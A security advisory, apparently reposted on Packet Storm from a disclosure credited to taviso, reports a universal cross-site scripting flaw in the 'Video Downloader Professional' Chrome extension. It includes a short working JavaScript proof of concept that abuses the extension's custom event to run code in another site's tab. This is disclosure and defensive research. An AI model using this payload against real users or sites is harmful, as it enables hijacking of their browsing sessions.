The Video Downloader Chrome extension suffers from a universal cross site scripting vulnerability.
b5da74f181d1f9d011fafbb0bdf6621ecd124de93f2688457aaf9d1ad4cce81fVideo Downloader Extension: Universal XSS
Browsing through the list of most popular Chrome extensions, I noticed this extension with 4M users:
<a href="https://chrome.google.com/webstore/detail/video-downloader-professi/elicpjhcidhpjomhibiffojpinpmmpil?hl=en" title="" class="" rel="nofollow">https://chrome.google.com/webstore/detail/video-downloader-professi/elicpjhcidhpjomhibiffojpinpmmpil?hl=en</a>
It has a pretty obvious universal XSS (i.e. it effectively lets any site take over any other site).
Any website can do this:
// Change the active tab
window.open("https://google.com");
// Run code in the new tab
setTimeout('document.dispatchEvent(new CustomEvent("link64_msgAddLinks", {detail: {type: "__L64_NAVIGATE_CHROME_URL", url: "javascript:alert(document.title);window.close()"}}))', 1000);
That will run arbitrary code on <a href="http://google.com" title="" class="" rel="nofollow">google.com</a>.
I reported this bug to the cws team.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: taviso
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed